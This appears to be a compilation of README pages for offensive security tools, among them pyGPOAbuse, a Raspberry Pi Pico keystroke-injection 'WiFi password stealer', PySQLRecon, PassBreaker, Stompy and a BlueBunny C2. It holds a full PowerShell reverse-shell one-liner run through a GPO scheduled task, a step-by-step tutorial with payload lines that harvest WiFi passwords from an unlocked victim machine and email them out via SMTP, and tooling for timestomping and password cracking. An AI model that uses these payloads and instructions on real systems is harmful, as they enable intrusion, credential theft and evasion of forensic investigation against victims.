This flow was reported to Microsoft on 3/23, which decided not to change the service behavior as it is considered "by design". As of 3/9/23, this tool can still be used without getting charged.
Each execution is limited to 3 hours.
Install the requirements listed in requirements.txt, then install the package:
pip install .
usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]
CloudMiner - Free computing power in Azure Automation Service
optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode
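An illustrative invocation (the resource ID placeholders follow the format shown in the usage above; the script name is a placeholder) that runs a PowerShell script three times could be:
python3 cloud_miner.py --path ./script.ps1 --id "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}" -c 3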
CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.
A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.
I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.
-Path: The path to the file or directory whose timestamps you wish to modify.
-NewTimestamp: The new DateTime value you wish to set for the file or directory.
-Credentials: (Optional) If you need to specify a different user's credentials.
-Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.
Basic usage, and with the -Recurse switch to apply timestamps recursively:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse
Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
Uscrapper extracts the following details from the provided website:
Uscrapper 2.0:
git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems
To run Uscrapper, use the following command-line syntax:
python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]
Arguments:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.
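An illustrative invocation (placeholder URL; -O is assumed here to be the report-generation option implied by the usage string above) might be:
python Uscrapper-v2.0.py -u https://example.com -O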
Python partial implementation of SharpGPOAbuse by @pkb1s
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.
Default behavior adds a local administrator.
Add john user to local administrators group (Password: H4x00r123..)
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
Reverse shell example
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user
Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE commands simulate a press of the corresponding keyboard keys.
We use DELAY
command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
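Purely as an illustrative DuckyScript 1.0 fragment (not one of this project's payloads), the STRING, ENTER and DELAY commands described above can be combined with the standard GUI (Windows key) command to wait for the HID to enumerate, open a Run dialog and launch PowerShell:
DELAY 2000
GUI r
DELAY 500
STRING powershell
ENTER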
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:
This approach was used for the Windows exploit. The whole payload can be seen here.
This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd
), you don't need to connect any jumper wire between pins.
Once passwords have been exported to the .txt
file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL
, SENDER_EMAIL
and yours email PASSWORD
. In addition, you could also update the body and the subject of the email.
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587
Note: After sending the data over email, the .txt file is deleted.
You can also use an SMTP server from another email provider, but you should be mindful of the SMTP server and port number you will write in the payload.
Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.
In order to use the Linux payload (payload2.dd
) you need to connect a jumper wire between GND
and GPIO5
in order to comply with the code in code.py
on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.
Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK
with the name of your USB drive in two places.
STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt
STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt
In addition, you will also need to update the Linux PASSWORD
in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
STRING echo PASSWORD | sudo -S echo
STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"
In order to run the wifi_passwords_print.sh
script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD
is your account's password and USBSTICK
is the name for your USB device.
NetworkManager is based on the concept of connection profiles and uses plugins for reading and writing them. It stores network configuration profiles in an .ini-style keyfile format; the keyfile plugin supports all the connection types and capabilities that NetworkManager has, and the files are located in /etc/NetworkManager/system-connections/. Based on this keyfile format, the payload uses the grep command with a regex to extract the data of interest. For filtering, a positive lookbehind assertion ((?<=keyword)) is used: the lookbehind matches at the position right after the keyword without making the keyword itself part of the match, so the regex (?<=keyword).* matches any text that follows the keyword. This allows the payload to capture the values after the ssid and psk (pre-shared key) keywords.
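As an illustration (the file name and values below are made up), a keyfile entry and the corresponding extraction look like this:
# /etc/NetworkManager/system-connections/HomeWiFi.nmconnection contains lines such as:
#   ssid=HomeWiFi
#   psk=SuperSecret123
sudo grep -oP '(?<=ssid=).*' /etc/NetworkManager/system-connections/*   # prints HomeWiFi
sudo grep -oP '(?<=psk=).*' /etc/NetworkManager/system-connections/*    # prints SuperSecret123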
For more information about NetworkManager, here are some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.
WiFi-password-stealer/resources/wifi_pass.txt (lines 1 to 5):
Wireless_Network_Name Password
--------------------- --------
WLAN1                 pass1
WLAN2                 pass2
WLAN3                 pass3
One of the advantages of the Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in; the machine only sees it as a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.
Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py script or manually change the template file. To run the script successfully you need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below is an example of how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
This pico-ducky currently works only on Windows OS.
This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to succeed, because in addition to physical access to an unlocked device you also need to know the password of the victim's Linux account.
The machine's or the network's firewall may prevent stolen data from being sent over the network.
Payload delays could be inadequate due to the varying speeds of the computers used to deploy the attack.
The pico-ducky device isn't stealthy at all; quite the opposite, it's really bulky, especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.
If the computer is set to a non-English environment, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
Known open items are the Caps Lock bug and the sudo password requirement.
Pantheon is a GUI application that allows users to display information regarding network cameras in various countries, as well as an integrated live feed for non-protected cameras.
Pantheon allows users to execute an API crawler. There was originally functionality that did not rely on any APIs (like Insecam), but Google's TOS kept getting in the way of the original scraping mechanism.
git clone https://github.com/josh0xA/Pantheon.git
cd Pantheon
pip3 install -r requirements.txt
python3 pantheon.py
chmod +x distros/ubuntu_install.sh
./distros/ubuntu_install.sh
chmod +x distros/debian-kali_install.sh
./distros/debian-kali_install.sh
Press Enter on a selected IP:Port to establish a Pantheon webview of the camera (use this at your own risk).
Left-click on a selected IP:Port to view the geolocation of the camera.
Right-click on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click on Mac).
Adjust the map as you please to see the markers.
The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html
MIT License
Copyright (c) Josh Schiavone
PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.
PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .
All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run, while commands marked with [NORM] can likely be run by normal users and do not require elevated privileges. Support for impersonation ([I]) or execution on linked servers ([L]) is denoted at the end of each command description.
adsi [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd [PRIV] Execute a system command using agent jobs [I,L]
agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns [NORM] Enumerate columns within a table [I,L]
databases [NORM] Enumerate databases on a server [I,L]
disableclr [PRIV] Disable CLR integration [I,L]
disableole [PRIV] Disable OLE automation procedures [I,L]
disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp [PRIV] Disable xp_cmdshell [I,L]
enableclr [PRIV] Enable CLR integration [I,L]
enableole [PRIV] Enable OLE automation procedures [I,L]
enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp [PRIV] Enable xp_cmdshell [I,L]
impersonate [NORM] Enumerate users that can be impersonated
info [NORM] Gather information about the SQL server
links [NORM] Enumerate linked servers [I,L]
olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
query [NORM] Execute a custom SQL query [I,L]
rows [NORM] Get the count of rows in a table [I,L]
search [NORM] Search a table for a column name [I,L]
smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables [NORM] Enumerate tables within a database [I,L]
users [NORM] Enumerate users with database access [I,L]
whoami [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]
PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:
pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]
View global options:
pysqlrecon --help
View command specific options:
pysqlrecon [GLOBAL_OPTS] COMMAND --help
Change the database authenticated to, or the database used by certain PySQLRecon commands (query, tables, columns, rows), with the --database flag.
Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.
Impersonate a user account while running a PySQLRecon command with the --impersonate flag.
--link and --impersonate are incompatible.
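Putting those flags together, invocations take roughly the following shape (a sketch only: the authentication GLOBAL_OPTS are omitted and the exact option forms should be confirmed with pysqlrecon --help):
pysqlrecon [GLOBAL_OPTS] whoami
pysqlrecon [GLOBAL_OPTS] --database msdb tables
pysqlrecon [GLOBAL_OPTS] --link SQL02 databases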
pysqlrecon uses Poetry to manage dependencies. Install from source and set up for development with:
git clone https://github.com/tw1sm/pysqlrecon
cd pysqlrecon
poetry install
poetry run pysqlrecon --help
PySQLRecon is easily extensible - see the template and instructions in resources
MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.
MacMaster requires Python 3.6 or later.
$ git clone https://github.com/HalilDeniz/MacMaster.git
cd MacMaster
$ python setup.py install
$ macmaster --help
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]
MacMaster: Mac Address Changer
options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value
--interface, -i: Specify the network interface.
--random, -r: Set a random MAC address.
--newmac, -nm: Set a specific MAC address.
--customoui, -co: Set a custom OUI for the MAC address.
--reset, -rs: Reset the MAC address to its original value.
--version, -V: Show the version of the program.
$ macmaster.py -i eth0 -nm 00:11:22:33:44:55
$ macmaster.py -i eth0 -r
$ macmaster.py -i eth0 -rs
$ macmaster.py -i eth0 -co 08:00:27
$ macmaster.py -V
Replace eth0 with your desired network interface.
You must run this script as root or with sudo for it to work properly, because changing a MAC address requires root privileges.
Contributions are welcome! To contribute to MacMaster, follow these steps:
For any inquiries or further information, you can reach me through the following channels:
NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.
NetworkSherlock requires Python 3.6 or later.
git clone https://github.com/HalilDeniz/NetworkSherlock.git
pip install -r requirements.txt
Update the networksherlock.cfg file with your Shodan API key:
[SHODAN]
api_key = YOUR_SHODAN_API_KEY
python3 networksherlock.py --help
usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target
NetworkSherlock: Port Scan Tool
positional arguments:
target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
192.168.1.0/24)
options:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Ports to scan (e.g. 1-1024, 21,22,80, or 80)
-t THREADS, --threads THREADS
Number of threads to use
-P {tcp,udp}, --protocol {tcp,udp}
Protocol to use for scanning
-V, --version-info Used to get version information
-s SAVE_RESULTS, --save-results SAVE_RESULTS
File to save scan results
-c, --ping-check Perform ping check before scanning
--use-shodan Enable Shodan integration for additional information
target: The target IP address(es), IP range, or CIDR block to scan.
-p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
-t, --threads: Number of threads to use.
-P, --protocol: Protocol to use for scanning (tcp or udp).
-V, --version-info: Obtain version information during banner grabbing.
-s, --save-results: Save results to the specified file.
-c, --ping-check: Perform a ping check before scanning.
--use-shodan: Enable Shodan integration.
Scan a single IP address on default ports:
python networksherlock.py 192.168.1.1
Scan an IP address with a custom range of ports:
python networksherlock.py 192.168.1.1 -p 1-1024
Scan multiple IP addresses on specific ports:
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443
Scan an entire subnet using CIDR notation:
python networksherlock.py 192.168.1.0/24 -p 80
Perform a scan using multiple threads for faster execution:
python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20
Scan using a specific protocol (TCP or UDP):
python networksherlock.py 192.168.1.1 -p 53 -P udp
python networksherlock.py 192.168.1.1 --use-shodan
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan
Perform a detailed scan with banner grabbing and save results to a file:
python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt
Scan an IP range after performing a ping check:
python networksherlock.py 10.0.0.1-10.0.0.255 -c
$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-6000
Threads : 25
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
21 /tcp open telnet 220 (vsFTPd 2.3.4)
80 /tcp open http HTTP/1.1 200 OK
139 /tcp open netbios-ssn %SMBr
25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
23 /tcp open smtp #' #'
445 /tcp open microsoft-ds %SMBr
514 /tcp open shell
512 /tcp open exec Where are you?
1524/tcp open ingreslock root@metasploitable:/#
2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
3306/tcp open mysql >
5900/tcp open unknown RFB 003.003
53 /tcp open domain
---------------------------------------------
$ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
********************************************
Scanning target: 10.0.2.1
Scanning IP : 10.0.2.1
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
53 /tcp open domain
********************************************
Scanning target: 10.0.2.2
Scanning IP : 10.0.2.2
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
445 /tcp open microsoft-ds
135 /tcp open epmap
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
21 /tcp open ftp 220 (vsFTPd 2.3.4)
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
23 /tcp open telnet #'
80 /tcp open http HTTP/1.1 200 OK
53 /tcp open kpasswd 464/udpcp
445 /tcp open domain %SMBr
3306/tcp open mysql >
********************************************
Scanning target: 10.0.2.20
Scanning IP : 10.0.2.20
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
Contributions are welcome! To contribute to NetworkSherlock, follow these steps:
py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.
Via pip
pip install pyamsi
Clone repository
git clone https://github.com/Tomiwa-Ot/py-amsi.git
cd py-amsi/
python setup.py install
from pyamsi import Amsi
# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default
# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default
# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level | Meaning
0          | AMSI_RESULT_CLEAN (File is clean)
1          | AMSI_RESULT_NOT_DETECTED (No threat detected)
16384      | AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
20479      | AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
32768      | AMSI_RESULT_DETECTED (File is considered malware)
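As a quick sanity check (a sketch based on the documented return format above; the EICAR string is the harmless industry-standard antivirus test string):
from pyamsi import Amsi

# EICAR test string, split in two so this source file itself is not flagged
eicar = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-" + "ANTIVIRUS-TEST-FILE!$H+H*"

result = Amsi.scan_string(eicar, "eicar_test")
print(result)  # e.g. {'Sample Size': 68, 'Risk Level': 32768, 'Message': ...} when flagged
if result.get("Risk Level", 0) >= 32768:
    print("Detected as malware")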
https://tomiwa-ot.github.io/py-amsi/index.html
C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs just over the air.
pip install pygatt "pygatt[GATTTOOL]"
Make sure BlueZ is installed and gatttool is usable:
sudo apt install bluez
git clone https://github.com/90N45-d3v/BlueBunny
cd BlueBunny/C2
sudo python c2-server.py
Load the BlueBunny payload (BlueBunny/payload.txt) onto your Bash Bunny and plug it in. Then browse to localhost:1472 and connect your Bash Bunny (your Bash Bunny will light up green when it's ready to pair).
You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.
# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE
# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload"); payload data is temporarily written to a file so that multiple commands can be executed, like in a payload script file
d_type = "cmd"
# Initialize BunnyLE
BunnyLE.init()
# Connect to your Bash Bunny
bb = BunnyLE.connect()
# Send the data and let it execute
BunnyLE.send(bb, data, d_type)
The Bluetooth stack used is well known but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem caused by BlueZ. Some kinds of errors caused by these temporary bugs usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and stay calm if they show up.
As mentioned, BlueZ, the base for the Bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to the Bash Bunny, or any other bugs or difficulties in the whole BlueBunny project, you are always welcome to contact me, be it a problem, an idea, a solution or just some nice feedback.
PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.
Clone the repository:
git clone https://github.com/HalilDeniz/PassBreaker.git
Install the required dependencies:
pip install -r requirements.txt
python passbreaker.py <password_hash> <wordlist_file> [--algorithm]
Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.
--algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
-s, --salt <salt>: Specify a salt value to use.
-p, --parallel: Enable parallel processing for faster cracking.
-c, --complexity: Evaluate password complexity before cracking.
-b, --brute-force: Perform a brute force attack.
--min-length <min_length>: Set the minimum password length for brute force attacks.
--max-length <max_length>: Set the maximum password length for brute force attacks.
--character-set <character_set>: Set the character set to use for brute force attacks.
Below are some more usage examples:
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5
This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123
This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity
This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123
This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel
This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.
These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.
This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.
Contributions are welcome! To contribute to PassBreaker, follow these steps:
If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:
PassBreaker is released under the MIT License. See LICENSE for more information.
T3SF is a framework that offers a modular structure for the orchestration of events based on a master scenario events list (MSEL), together with a set of rules defined for each exercise (optional) and a configuration that allows defining the parameters of the corresponding platform. The main module communicates with the platform-specific module (Discord, Slack, Telegram, etc.), which presents the events in the input channels as injects for each platform. In addition, the framework supports different use cases: "single organization, multiple areas", "multiple organizations, single area" and "multiple organizations, multiple areas".
To use the framework with your desired platform, whether it's Slack or Discord, you will need to install the required modules for that platform. But don't worry, installing these modules is easy and straightforward.
To do this, you can follow this simple step-by-step guide, or if you're already comfortable installing packages with pip, you can skip to the last step!
# Python 3.6+ required
python -m venv .venv # We will create a python virtual environment
source .venv/bin/activate # Let's get inside it
pip install -U pip # Upgrade pip
Once you have created a Python virtual environment and activated it, you can install the T3SF framework for your desired platform by running the following command:
pip install "T3SF[Discord]" # Install the framework to work with Discord
or
pip install "T3SF[Slack]" # Install the framework to work with Slack
This will install the T3SF framework along with the required dependencies for your chosen platform. Once the installation is complete, you can start using the framework with your platform of choice.
We strongly recommend following the platform-specific guidance within our Read The Docs! Here are the links:
We created this framework to simplify all your work!
$ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:slack
Inside your .env file you have to provide the SLACK_BOT_TOKEN and SLACK_APP_TOKEN tokens. Read more about it here.
There is another environment variable to set, MSEL_PATH. This variable tells the framework the path where the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume, also change this variable.
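A minimal .env for the Slack container could look like this (the token values are placeholders):
# Slack bot and app-level tokens (placeholders)
SLACK_BOT_TOKEN=xoxb-...
SLACK_APP_TOKEN=xapp-...
# Must match the path the MSEL volume is mounted to
MSEL_PATH=/app/MSEL.json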
$ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:discord
Inside your .env file you have to provide the DISCORD_TOKEN token. Read more about it here.
There is another environment variable to set, MSEL_PATH. This variable tells the framework the path where the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume, also change this variable.
Once you have everything ready, use our template for main.py, or modify the following code:
Here is an example if you want to run the framework with the Discord bot and a GUI.
from T3SF import T3SF
import asyncio
async def main():
await T3SF.start(MSEL="MSEL_TTX.json", platform="Discord", gui=True)
if __name__ == '__main__':
asyncio.run(main())
Or if you prefer to run the framework without a GUI and with Slack instead, you can modify the arguments, and that's it! Yes, that simple!
await T3SF.start(MSEL="MSEL_TTX.json", platform="Slack", gui=False)
If you need more help, you can always check our documentation here!
Mass bruteforce network protocols
Simple personal script to quickly mass bruteforce common services across a large network.
